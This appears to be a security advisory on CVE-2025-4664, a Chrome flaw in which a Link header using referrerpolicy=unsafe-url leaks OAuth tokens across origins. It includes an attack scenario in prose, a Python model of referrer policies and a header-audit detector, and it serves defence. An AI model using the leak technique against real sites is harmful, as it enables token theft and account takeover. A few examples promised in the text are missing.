🎯 CVE-2025-4664: High-Severity Referrer-Policy Vulnerability in Google Chrome
📅 Published Date: May 15, 2025
🧠 Overview
CVE-2025-4664 is a critical vulnerability identified in the Loader component of Google Chrome, and it is being actively exploited in the wild. It allows attackers to leak sensitive data across origins via specially crafted pages. This poses a serious threat, especially to flows that use OAuth authentication.
🔍 Technical Analysis
Root Cause:
Chrome fails to properly enforce the referrer-policy in certain cross-origin Link header scenarios.
Affected Component:
Loader — the system responsible for managing resource prioritization and preloading behavior.
Referrer-Policy Explanation:
Attackers can manipulate the Link header to force the browser to send the full referrer URL, including sensitive data such as tokens. Example:
This allows tokens or authorization codes embedded in OAuth URLs to be leaked to third-party sites.
🔓 Exploitation Scenario
- The victim visits a malicious HTML page controlled by the attacker.
- The page includes a Link header with referrerpolicy=unsafe-url.
- Chrome leaks the full referrer URL (e.g., https://legit-site.com/oauth/callback?token=xyz) to the attacker's server.
- The attacker collects this information and performs account takeover.
This scenario is particularly dangerous in ecosystems that rely on SSO, OAuth2, or OpenID Connect.
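To make the leak concrete, the following added example (not code from the advisory or from Chromium) models the standard Referrer Policy algorithm and shows what a browser sends as the Referer for each policy when the referring page is the OAuth callback URL from the scenario above and the destination is a cross-origin resource. The destination host third-party.example and the list of sensitive parameter names are assumptions; the bug itself (Chrome honouring unsafe-url from a cross-origin Link header where it should not) is not modelled, only the policy semantics that explain why unsafe-url exposes the token while the default policy does not.

```python
"""Model of the WHATWG Referrer Policy algorithm, used to show which part of a
page URL reaches a cross-origin destination under each policy.
Added example; not code from the advisory or from Chromium."""
from urllib.parse import parse_qs, urlsplit, urlunsplit

POLICIES = (
    "no-referrer", "no-referrer-when-downgrade", "same-origin", "origin",
    "strict-origin", "origin-when-cross-origin",
    "strict-origin-when-cross-origin", "unsafe-url",
)


def _origin(url):
    """Serialized origin plus a trailing slash, as browsers send it."""
    p = urlsplit(url)
    port = f":{p.port}" if p.port else ""
    return f"{p.scheme}://{p.hostname or ''}{port}/"


def _full(url):
    """'Strip url for use as a referrer': drop userinfo and fragment, keep path and query."""
    p = urlsplit(url)
    port = f":{p.port}" if p.port else ""
    return urlunsplit((p.scheme, f"{p.hostname or ''}{port}", p.path, p.query, ""))


def compute_referrer(referrer_url, target_url, policy):
    """Return the Referer value (or None) a conforming browser sends for a request
    from referrer_url to target_url under the given referrer policy."""
    if policy not in POLICIES:
        raise ValueError(f"unknown referrer policy {policy!r}")
    src, dst = urlsplit(referrer_url), urlsplit(target_url)
    same_origin = (src.scheme, src.hostname, src.port) == (dst.scheme, dst.hostname, dst.port)
    downgrade = src.scheme == "https" and dst.scheme != "https"
    full, origin = _full(referrer_url), _origin(referrer_url)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full                      # path and query always sent: the leak
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin":
        return origin
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin
    # strict-origin-when-cross-origin: the browser default
    if same_origin:
        return full
    return None if downgrade else origin


def leaked_params(referrer, sensitive=("token", "code", "state", "access_token")):
    """Names of sensitive query parameters (assumed list) present in a Referer value."""
    if not referrer:
        return set()
    return set(parse_qs(urlsplit(referrer).query)) & set(sensitive)


if __name__ == "__main__":
    callback = "https://legit-site.com/oauth/callback?token=xyz"   # URL from the advisory's scenario
    third_party = "https://third-party.example/pixel.png"           # constructed cross-origin destination
    for policy in POLICIES:
        ref = compute_referrer(callback, third_party, policy)
        print(f"{policy:32} -> {str(ref):50} leaks {sorted(leaked_params(ref))}")
```

Running the block prints one line per policy: only unsafe-url and no-referrer-when-downgrade hand the token-bearing query string to the cross-origin host, which is why the recommendations below call for a strict Referrer-Policy and for keeping tokens out of URLs in the first place.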
🛡️ Google’s Mitigation
- Fixed Versions:
  - Windows/Linux: 136.0.7103.113
  - macOS: 136.0.7103.114
- Patch Summary:
  - Reinforced validation in the Loader component to prevent misuse of referrerpolicy.
  - Updated parsing behavior for Link headers to restrict cross-origin abuse.
🚨 CISA Alert
CISA has added CVE-2025-4664 to its Known Exploited Vulnerabilities (KEV) catalog.
This means the flaw is considered a high-risk threat for public institutions, critical infrastructure providers, and enterprise environments.
🔐 Recommendations – For Cybersecurity Professionals
1. Enforce Browser Updates
Ensure Chrome is updated organization-wide to the latest patched version.
2. Review Web Application Behavior
Avoid exposing sensitive tokens or parameters (e.g., token, code, state) in URLs. Consider POST-based flows or encrypted state management.
3. Set Strong CSP and Referrer Policies
Apply strict header policies to reduce leakage vectors:
4. Update IDS/IPS Rules
Create detection rules for malicious Link headers that use the unsafe-url referrer policy.
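As an added example for recommendations 3 and 4 (not code from the advisory), the following audit function parses captured HTTP response headers, flags any Link entry that requests referrerpolicy=unsafe-url, and checks that the response carries a strict Referrer-Policy and a Content-Security-Policy. The two sample responses and the recommended header values are constructed; the parsing follows the Link header syntax of RFC 8288 for the common comma- and semicolon-separated form.

```python
"""Audit HTTP response headers for referrer-leak conditions:
Link headers requesting referrerpolicy=unsafe-url, and a missing or weak
Referrer-Policy / CSP. Added example; samples are constructed, not captured."""
import re
from collections import defaultdict

# Policies that send the full URL (query string included) to at least some cross-origin hosts.
WEAK_REFERRER_POLICIES = {"", "unsafe-url", "no-referrer-when-downgrade"}

# Assumed defensive baseline for a page such as an OAuth callback.
RECOMMENDED_HEADERS = {
    "Referrer-Policy": "no-referrer",
    "Content-Security-Policy": "default-src 'self'",
}

# <url>; param=value; ... , <url2>; ...   (one match per link-value)
_LINK_RE = re.compile(r"<([^>]*)>\s*((?:;[^,]*)*)")


def parse_headers(raw):
    """Map lowercase header name -> list of values from a raw response head."""
    headers = defaultdict(list)
    for line in raw.splitlines():
        if line.startswith("HTTP/") or ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()].append(value.strip())
    return headers


def parse_link_header(value):
    """Split a Link header into [{'url': ..., 'params': {name: value}}, ...]."""
    links = []
    for match in _LINK_RE.finditer(value):
        params = {}
        for part in match.group(2).split(";"):
            part = part.strip()
            if not part:
                continue
            key, _, val = part.partition("=")
            params[key.strip().lower()] = val.strip().strip('"').lower()
        links.append({"url": match.group(1), "params": params})
    return links


def audit_response(raw):
    """Return a list of findings; an empty list means no referrer-leak condition was seen."""
    headers = parse_headers(raw)
    findings = []
    for value in headers.get("link", []):
        for link in parse_link_header(value):
            if link["params"].get("referrerpolicy") == "unsafe-url":
                findings.append(
                    f"Link to {link['url']} requests referrerpolicy=unsafe-url "
                    "(full referrer URL, query string included, would be sent cross-origin)")
    policy = headers.get("referrer-policy", [""])[-1].lower()
    if policy in WEAK_REFERRER_POLICIES:
        findings.append(f"Referrer-Policy is {policy or 'absent'}; "
                        f"set {RECOMMENDED_HEADERS['Referrer-Policy']!r}")
    if "content-security-policy" not in headers:
        findings.append("no Content-Security-Policy header; "
                        f"set {RECOMMENDED_HEADERS['Content-Security-Policy']!r}")
    return findings


# Constructed sample: a page that preloads a third-party script with the weak policy.
WEAK_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Link: <https://cdn.third-party.example/app.js>; rel=preload; as=script; referrerpolicy=unsafe-url, <https://fonts.example/f.woff2>; rel=preload; as=font
Referrer-Policy: no-referrer-when-downgrade
"""

# Constructed sample: the same page with the headers corrected.
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Link: <https://cdn.third-party.example/app.js>; rel=preload; as=script; referrerpolicy=strict-origin-when-cross-origin
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self'
"""

if __name__ == "__main__":
    for label, sample in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"[{label}]")
        for finding in audit_response(sample) or ["no findings"]:
            print("  -", finding)
```

The same checks translate directly into a proxy or IDS rule: match on a Link header containing referrerpolicy=unsafe-url, and separately alert on responses from token-handling endpoints that lack a strict Referrer-Policy.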
💡 Final Thoughts
CVE-2025-4664 highlights how misconfigurations in seemingly minor browser behaviors — like referrer-policy — can have wide-reaching consequences. As always, secure-by-default design principles and layered defense strategies remain critical.